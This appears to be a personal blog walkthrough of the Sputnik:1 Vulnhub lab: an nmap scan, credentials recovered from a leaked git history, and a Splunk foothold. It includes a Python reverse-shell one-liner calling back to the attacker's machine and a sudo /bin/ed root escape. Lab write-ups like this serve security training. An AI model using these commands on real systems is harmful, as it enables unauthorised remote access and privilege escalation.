<!doctype html><html lang=en-us><head>
<script type=application/javascript>var doNotTrack=!1;doNotTrack||(function(a,e,f,g,b,c,d){a.GoogleAnalyticsObject=b,a[b]=a[b]||function(){(a[b].q=a[b].q||[]).push(arguments)},a[b].l=1*new Date,c=e.createElement(f),d=e.getElementsByTagName(f)[0],c.async=1,c.src=g,d.parentNode.insertBefore(c,d)}(window,document,'script','https://www.google-analytics.com/analytics.js','ga'),ga('create','UA-194024736-1','auto'),ga('send','pageview'))</script>
<meta charset=utf-8>
<title>Sputnik:1 Vulnhub Walkthrough</title>
<meta name=viewport content="width=device-width,initial-scale=1">
<meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1">
<meta name=author content="Nasef">
<meta name=generator content="Hugo 0.87.0">
<link rel=stylesheet href=https://iamnasef.com/css/bootstrap.min.css>
<link rel=stylesheet href=https://iamnasef.com/font-awesome/css/font-awesome.min.css>
<link href=https://iamnasef.com/scss/style.min.css rel=stylesheet>
<link rel="shortcut icon" href=https://iamnasef.com/images/favicon.png type=image/x-icon>
<link rel=icon href=https://iamnasef.com/images/favicon.ico type=image/x-icon>
</head><body><nav class="navbar navbar-expand-lg site-navigation">
<div class=container>
<a class=navbar-brand href=https://iamnasef.com/>
<img src=https://iamnasef.com/images/logo.png alt=logo>
</a>
<button class="navbar-toggler collapsed" type=button data-toggle=collapse data-target=#sitenavbar>
<span class=icon-bar></span>
<span class=icon-bar></span>
<span class=icon-bar></span>
</button>
<div class="collapse navbar-collapse" id=sitenavbar>
<ul class="navbar-nav ml-auto main-nav">
<li class=nav-item>
<a class=nav-link href=https://iamnasef.com/>Home</a>
</li>
<li class=nav-item>
<a class=nav-link href=https://iamnasef.com/projects>Projects</a>
</li>
<li class=nav-item>
<a class=nav-link href=https://iamnasef.com/courses>Courses</a>
</li>
<li class=nav-item>
<a class=nav-link href=https://iamnasef.com/blog>Blog</a>
</li>
<li class=nav-item>
<a class="nav-link btn btn-sm btn-primary btn-sm-rounded" href=https://iamnasef.com/contact>
<span class=btn-area>
<span data-text="Contact Me">
Contact Me
</span>
</span>
</a>
</li>
</ul>
</div>
</div>
</nav>
<main>
<section class="site-blog details">
<div class=container>
<div class="row justify-content-center">
<div class=col-lg-8>
<article class=site-blog-details>
<h2 class=blog-title>Sputnik:1 Vulnhub Walkthrough</h2>
<p><span>September 26, 2020</span> by <span>Nasef</span></p>
<img class=feature-image src=https://iamnasef.com/images/blog/featured-image-vulnhub.png alt=blog-feature-image>
<p>Sputnik:1 is a machine in which I used an enumration to get admin credintials from the history of github repo to obtain shell access and then exploited the misconfigured sudo permissions to get root Access.</p>
<h3 id=scanning>Scanning</h3>
<p>As always, I started scanning with Nmap</p>
<pre><code>root@kali:/home/kali# nmap -sC -sV -p- 192.168.198.141
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-26 08:04 EDT                                                                                           Host is up (0.00067s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE         VERSION
8089/tcp  open  ssl/http        Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-03-29T11:03:21
|_Not valid after:  2022-03-28T11:03:21
8191/tcp  open  limnerpressure?
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.0 200 OK
|     Connection: close
|     Content-Type: text/plain
|     Content-Length: 85
|_    looks like you are trying to access MongoDB over HTTP on the native driver port.
55555/tcp open  http            Apache httpd 2.4.29 ((Ubuntu))
| http-git: 
|   192.168.198.141:55555/.git/
|     Git repository found!
|_    Repository description: Unnamed repository; edit this file 'description' to name the...
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Flappy Bird Game
61337/tcp open  http            Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://192.168.198.141:61337/en-US/account/login?return_to=%2Fen-US%2F
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8191-TCP:V=7.80%I=7%D=9/26%Time=5F6F2E75%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,A9,&quot;HTTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nContent-
SF:Type:\x20text/plain\r\nContent-Length:\x2085\r\n\r\nIt\x20looks\x20like
SF:\x20you\x20are\x20trying\x20to\x20access\x20MongoDB\x20over\x20HTTP\x20
SF:on\x20the\x20native\x20driver\x20port\.\r\n&quot;)%r(FourOhFourRequest,A9,&quot;H
SF:TTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nContent-Type:\x20text/
SF:plain\r\nContent-Length:\x2085\r\n\r\nIt\x20looks\x20like\x20you\x20are
SF:\x20trying\x20to\x20access\x20MongoDB\x20over\x20HTTP\x20on\x20the\x20n
SF:ative\x20driver\x20port\.\r\n&quot;);
MAC Address: 00:0C:29:D8:32:B0 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.58 seconds

</code></pre><p>Four HTTP Services is up, the 8089 is down, the 8191 has only text, the 55555 has falappy bird game, and the 61337 has splunk enterprise page which requires user and password.</p>
<h3 id=git-history>Git History</h3>
<p>I tried SQLmap then bruteforcing the 61337 but it&rsquo;s neither vulerable to SQL Injector nor I got the creds by bruteforcing. the nmap result above shows /.git/ directory so I started reading the files until I got the repo&rsquo;s clone url.</p>
<p><img src=/images/blog/004/1.png alt=Username></p>
<p>so I cloned it and browsed it&rsquo;s history until I got a secret file contains a credintials. I tried the credintials on the 61337 http service and it worked!</p>
<pre><code>root@kali:/home/kali/Desktop/temp# git clone https://github.com/ameerpornillos/flappy.git
Cloning into 'flappy'...
remote: Enumerating objects: 65, done.
remote: Total 65 (delta 0), reused 0 (delta 0), pack-reused 65
Unpacking objects: 100% (65/65), 31.50 KiB | 767.00 KiB/s, done.
root@kali:/home/kali/Desktop/temp# cd flappy/
root@kali:/home/kali/Desktop/temp/flappy# git log --stat
commit 884adf394909a8f5989a163bb666003ea870f582 (HEAD -&gt; master, origin/master, origin/HEAD)
Author: Ameer Pornillos &lt;44928938+ameerpornillos@users.noreply.github.com&gt;
Date:   Fri Mar 29 23:22:06 2019 +0800

    Update new file

 index.html | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

commit d4a672434b93fd156dd61e2b756048501fe0bbc6
Author: Ameer Pornillos &lt;44928938+ameerpornillos@users.noreply.github.com&gt;
Date:   Fri Mar 29 23:21:09 2019 +0800

    Delete new file

 release | 1 -
 1 file changed, 1 deletion(-)

....

commit fdd806897314ed67442fd12c4fc0ccc678dc9857
Author: Ameer Pornillos &lt;44928938+ameerpornillos@users.noreply.github.com&gt;
Date:   Fri Mar 29 23:18:45 2019 +0800

    Delete new file

 secret | Bin 1538 -&gt; 0 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)

commit 5c5d8adcf57267bc0a936a7db21ddb90fcbcd9ca
Author: Ameer Pornillos &lt;44928938+ameerpornillos@users.noreply.github.com&gt;
Date:   Fri Mar 29 23:18:11 2019 +0800
!
root@kali:/home/kali/Desktop/temp/flappy# git checkout 07fda135aae22fa7869b3de9e450ff7cacfbc717
Note: switching to '07fda135aae22fa7869b3de9e450ff7cacfbc717'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:

  git switch -c &lt;new-branch-name&gt;

Or undo this operation with:

  git switch -

Turn off this advice by setting config variable advice.detachedHead to false

HEAD is now at 07fda13 Commit new file
root@kali:/home/kali/Desktop/temp/flappy# ls
index.html  README.md  secret  sheet.png  sprite.js
root@kali:/home/kali/Desktop/temp/flappy# cat secret 
sputnik:ameer_says_thank_you_and_good_job

</code></pre><p><img src=/images/blog/004/2.png alt=Username></p>
<h3 id=basic-shell>Basic Shell</h3>
<p>I searched for how to get a shell on splunk eterprise and found this amazing article
<a href=https://github.com/TBGSecurity/splunk_shells>https://github.com/TBGSecurity/splunk_shells</a></p>
<p>I followed the Instructions mentioned, but the shell I got is kindda broken so I started another shell</p>
<h5 id=target>Target</h5>
<pre><code>root@kali:/home/kali# nc -lvnp 7777
listening on [any] 7777 ...
connect to [192.168.198.137] from (UNKNOWN) [192.168.198.141] 47438
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;192.168.198.137&quot;,1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);'

</code></pre><h5 id=hacker>Hacker</h5>
<pre><code>root@kali:/home/kali# nc -lvnp 1111
listening on [any] 1111 ...
connect to [192.168.198.137] from (UNKNOWN) [192.168.198.141] 52444
/bin/sh: 0: can't access tty; job control turned off
$ sudo -l
sudo: no tty present and no askpass program specified
$ python -c 'import pty; pty.spawn(&quot;/bin/bash&quot;)'
</code></pre><h3 id=privilege-escalation>Privilege Escalation</h3>
<p>I ran diffreent Enumeration scripts and found an intersting sudo privilege which allows us to run /bin/ed as root. after searching in the gtfio of how to get a root shell. I ran the following commands.</p>
<pre><code>splunk@sputnik:/$ sudo -l
sudo -l
[sudo] password for splunk: ameer_says_thank_you_and_good_job

Matching Defaults entries for splunk on sputnik:                                                                  
    env_reset, mail_badpass,                                                                                      
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin                      
                                                                                                                  
User splunk may run the following commands on sputnik:                                                            
    (root) /bin/ed                                                                                                
splunk@sputnik:/$ sudo /bin/ed                                                                                    
sudo /bin/ed                                                                                                      
!/bin/sh                                                                                                          
!/bin/sh                                                                                                          
# whoami                                                                                                          
whoami                                                                                                            
root                                                                                                              
# cd ~                                                                                                            
cd ~                                                                                                              
# ls                                                                                                              
ls                                                                                                                
flag.txt                                                                                                          
# cat flag.txt
cat flag.txt
 _________________________________________
/ Congratulations!                        \
|                                         |
| You did it!                             |
|                                         |
| Thank you for trying out this challenge |
| and hope that you learn a thing or two. |
|                                         |
| Check the flag below.                   |
|                                         |
| flag_is{w1th_gr34t_p0w3r_c0m35_w1th_gr3 |
| 4t_r3sp0ns1b1l1ty}                      |
|                                         |
| Hope you enjoy solving this challenge.  |
| :D                                      |
|                                         |
\ - ameer (from hackstreetboys)           /
 -----------------------------------------
      \                    / \  //\
       \    |\___/|      /   \//  \\
            /0  0  \__  /    //  | \ \    
           /     /  \/_/    //   |  \  \  
           @_^_@'/   \/_   //    |   \   \ 
           //_^_/     \/_ //     |    \    \
        ( //) |        \///      |     \     \
      ( / /) _|_ /   )  //       |      \     _\
    ( // /) '/,_ _ _/  ( ; -.    |    _ _\.-~        .-~~~^-.
  (( / / )) ,-{        _      `-.|.-~-.           .~         `.
 (( // / ))  '/\      /                 ~-. _ .-~      .-~^-.  \
 (( /// ))      `.   {            }                   /      \  \
  (( / ))     .----~-.\        \-'                 .~         \  `. \^-.
             ///.----..&gt;        \             _ -~             `.  ^-`  ^-_
               ///-._ _ _ _ _ _ _}^ - - - - ~                     ~-- ,.-~
                                                                  /.-~

</code></pre><p>and voila here is the root privilege!</p>
</article>
</div>
</div>
</div>
</section>
<section class=site-cta id=contact style=background-image:url(https://iamnasef.com/images/backgrounds/cta-background.jpg)>
<div class=container>
<div class=row>
<div class="col-12 text-center">
<h1 class=site-cta-title>SAY HELLO</h1>
<a class=mail-link href=mailto:hello@iamnasef.com><h2 class=mail>HELLO@IAMNASEF.COM</h2></a>
<div class=sm-links>
<a href=https://twitter.com/iamnasef><i class="fa fa-twitter-square" aria-hidden=true></i></a>
<a href=https://www.linkedin.com/in/iamnasef/><i class="fa fa-linkedin-square" aria-hidden=true></i></a>
<a href=https://github.com/iamnasef><i class="fa fa-github-square" aria-hidden=true></i></a>
<a href=https://www.youtube.com/channel/UCoxP4Z6Wfz60fFtB31gyNlQ><i class="fa fa-youtube-square" aria-hidden=true></i></a>
</div>
</div>
</div>
</div>
</section>
</main><footer class=site-footer>
<div class=container>
<div class=row>
<div class=col-12>
<div class=site-footer-logo><a href=https://iamnasef.com/><img src=https://iamnasef.com/images/logo-footer.png alt=logo-footer width=100px height=100px></a></div>
</div>
<div class="col-lg-3 col-md-6">
<div class=site-footer-widget>
<h5 class=site-footer-widget-title>Contact Info</h5>
<p class=site-footer-widget-description>
<a href=mailto:hello@iamnansef.com>hello@iamnansef.com</a>
</p>
</div>
</div>
<div class="col-lg-2 col-md-6">
<div class=site-footer-widget>
<h5 class=site-footer-widget-title>Check it</h5>
<ul class=site-footer-widget-links>
<li><a href=https://iamnasef.com/blog>Blog</a></li>
<li><a href=https://iamnasef.com/projects>Projects</a></li>
<li><a href=https://iamnasef.com/courses>Courses</a></li>
<li><a href=https://iamnasef.com/contact>Contact</a></li>
</ul>
</div>
</div>
<div class="col-lg-2 col-md-6">
<div class=site-footer-widget>
<h5 class=site-footer-widget-title>Social Media</h5>
<ul class=site-footer-widget-links>
<li><a href=https://www.linkedin.com/in/iamnasef/>Linkedin</a></li>
<li><a href=https://twitter.com/iamnasef>Twitter</a></li>
<li><a href=https://github.com/iamnasef>Github</a></li>
<li><a href=https://www.youtube.com/channel/UCoxP4Z6Wfz60fFtB31gyNlQ>YouTube</a></li>
</ul>
</div>
</div>
<div class="col-lg-3 col-md-6">
<div class=site-footer-widget>
<h5 class=site-footer-widget-title>Keeping you safe</h5>
<p class=site-footer-widget-description>
Application Security Engineering<br>Cyber Security Technical Training<br>Cyber Security Awarness
</p>
</div>
</div>
<div class="col-lg-2 col-12">
<a href=#top class=site-footer-widget-top>
<img src=https://iamnasef.com/images/to-top.svg alt=back-to-top>
<p>
I want to
<br>
visit again
</p>
</a>
</div>
</div>
</div>
</footer>
<script src=https://iamnasef.com/js/formhandler.min.js></script>
<script src=https://iamnasef.com/js/vendor.min.js></script>
<script src=https://iamnasef.com/js/script.min.js></script></body>
</html>